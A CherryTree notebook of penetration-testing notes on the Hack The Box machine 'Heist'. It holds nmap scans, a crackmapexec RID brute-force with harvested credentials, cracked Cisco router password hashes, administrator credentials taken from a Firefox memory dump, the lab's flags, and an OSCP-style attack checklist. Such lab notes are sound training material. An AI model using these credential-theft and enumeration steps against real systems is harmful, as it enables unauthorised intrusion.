SQLite format 3

CREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER )
CREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )
CREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )
CREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )

10.11.1.

Enumeration

TCP

    nmap -sC -sV -oA ./heist 10.10.10.149
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-03 14:35 EDT
    Nmap scan report for 10.10.10.149
    Host is up (0.23s latency).
    Not shown: 997 filtered ports
    PORT    STATE SERVICE       VERSION
    80/tcp  open  http          Microsoft IIS httpd 10.0
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    | http-methods:
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    | http-title: Support Login Page
    |_Requested resource was login.php
    135/tcp open  msrpc         Microsoft Windows RPC
    445/tcp open  microsoft-ds?
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 16s
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-04-03T18:36:23
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 89.38 seconds

UDP

Web Services

    Guest Login Allowed Hazard included
    Cisco Router Config in attachment

    version 12.2
    no service pad
    service password-encryption
    !
    isdn switch-type basic-5ess
    !
    hostname ios-1
    !
    security passwords min-length 12
    enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
    !
    username rout3r password 7 0242114B0E143F015F5D1E161713
    username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
    !
    !
    ip ssh authentication-retries 5
    ip ssh version 2
    !
    !
    router bgp 100
     synchronization
     bgp log-neighbor-changes
     bgp dampening
     network 192.168.0.0 mask 300.255.255.0
     timers bgp 3 9
     redistribute connected
    !
    ip classless
    ip route 0.0.0.0 0.0.0.0 192.168.0.1
    !
    !
    access-list 101 permit ip any any
    dialer-list 1 protocol ip list 101
    !
    no ip http server
    no ip http secure-server
    !
    line vty 0 4
     session-timeout 600
     authorization exec SSH
     transport input ssh

Nikto

Dirb\DirBuster

WebDav

CMS

Other Services

SMB

SNMP

DB

Other

Exploitation

    Service Exploited:
    Vulnerability Type:
    Exploit POC:
    Description:
    Discovery of Vulnerability
    Evil-WinRM with the Chase credentials from crackmapexec
    Exploit Code Used
    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Post Exploitation

Script Results

Host Information

    Operating System
    Architecture
    Domain
    Installed Updates

File System

    Writeable Files\Directories
    Directory List

Running Processes

    Process List

    Firefox process memory dump

    "C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
    MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
    localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
    MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=

    ADMIN CREDENTIAL

Installed Applications

    Installed Applications

Users

    kali@kali:~/Heist$ crackmapexec smb 10.10.10.149 -u hazard -p stealth1agent --rid-brute
    SMB  10.10.10.149  445  SUPPORTDESK  [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
    SMB  10.10.10.149  445  SUPPORTDESK  [+] SUPPORTDESK\hazard:stealth1agent
    SMB  10.10.10.149  445  SUPPORTDESK  [+] Brute forcing RIDs
    SMB  10.10.10.149  445  SUPPORTDESK  500: SUPPORTDESK\Administrator (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  501: SUPPORTDESK\Guest (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  503: SUPPORTDESK\DefaultAccount (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  513: SUPPORTDESK\None (SidTypeGroup)
    SMB  10.10.10.149  445  SUPPORTDESK  1008: SUPPORTDESK\Hazard (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  1009: SUPPORTDESK\support (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  1012: SUPPORTDESK\Chase (SidTypeUser)
    SMB  10.10.10.149  445  SUPPORTDESK  1013: SUPPORTDESK\Jason (SidTypeUser)

    Found Pre-Foothold
    Administrator
    support
    Chase
    Jason

    Groups

Network

    IPConfig\IFConfig
    Network Processes
    ARP
    DNS
    Route

Scheduled Jobs

    Scheduled Tasks

Priv Escalation

    Service Exploited: Firefox
    Vulnerability Type: Memory Dump Credential Leak
    Exploit POC:
    Description:
    Discovery of Vulnerability
    Procdump64.exe
    Exploit Code Used
    Obtained Administrator credentials from memory dump
    Proof\Local.txt File
    ☐ Screenshot with ifconfig\ipconfig
    ☐ Submit to OSCP Exam Panel

Goodies

Hashes

Passwords

    secret:stealth1agent
    rout3r:$uperP@ssword
    admin:Q4)sJu\Y8qz*A3?d
    Above found in router configs

    SUPPORTDESK\hazard:stealth1agent
    SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d
    Administrator:4dD!5}x/re8]FBuZ

Proof\Flags\Other

    User - a127daef77ab6d9d92008653295f59c4
    Root - 50dfa3c6bfd20e2e0d071b073d766897

Software Versions

    Software Versions
    Potential Exploits

Log Book

Methodology

    Network Scanning
    ☐ nmap -sn 10.11.1.*
    ☐ nmap -sL 10.11.1.*
    ☐ nbtscan -r 10.11.1.0/24
    ☐ smbtree

    Individual Host Scanning
    ☐ nmap --top-ports 20 --open -iL iplist.txt
    ☐ nmap -sS -A -sV -O -p- ipaddress
    ☐ nmap -sU ipaddress

    Service Scanning

    WebApp
    ☐ Nikto
    ☐ dirb
    ☐ dirbuster
    ☐ wpscan
    ☐ dotdotpwn
    ☐ view source
    ☐ davtest\cadaver
    ☐ droopescan
    ☐ joomscan
    ☐ LFI\RFI Test

    Linux\Windows
    ☐ snmpwalk -c public -v1 ipaddress 1
    ☐ smbclient -L //ipaddress
    ☐ showmount -e ipaddress port
    ☐ rpcinfo
    ☐ Enum4Linux

    Anything Else
    ☐ nmap scripts (locate *nse* | grep servicename)
    ☐ hydra
    ☐ MSF Aux Modules
    ☐ Download the software

    Exploitation
    ☐ Gather Version Numbers
    ☐ Searchsploit
    ☐ Default Creds
    ☐ Creds Previously Gathered
    ☐ Download the software

    Post Exploitation

    Linux
    ☐ linux-local-enum.sh
    ☐ linuxprivchecker.py
    ☐ linux-exploit-suggestor.sh
    ☐ unix-privesc-check.py

    Windows
    ☐ wpc.exe
    ☐ windows-exploit-suggestor.py
    ☐ windows_privesc_check.py
    ☐ windows-privesc-check2.exe

    Priv Escalation
    ☐ access internal services (portfwd)
    ☐ add account

    Windows
    ☐ List of exploits

    Linux
    ☐ sudo su
    ☐ KernelDB
    ☐ Searchsploit

    Final
    ☐ Screenshot of IPConfig\WhoamI
    ☐ Copy proof.txt
    ☐ Dump hashes
    ☐ Dump SSH Keys
    ☐ Delete files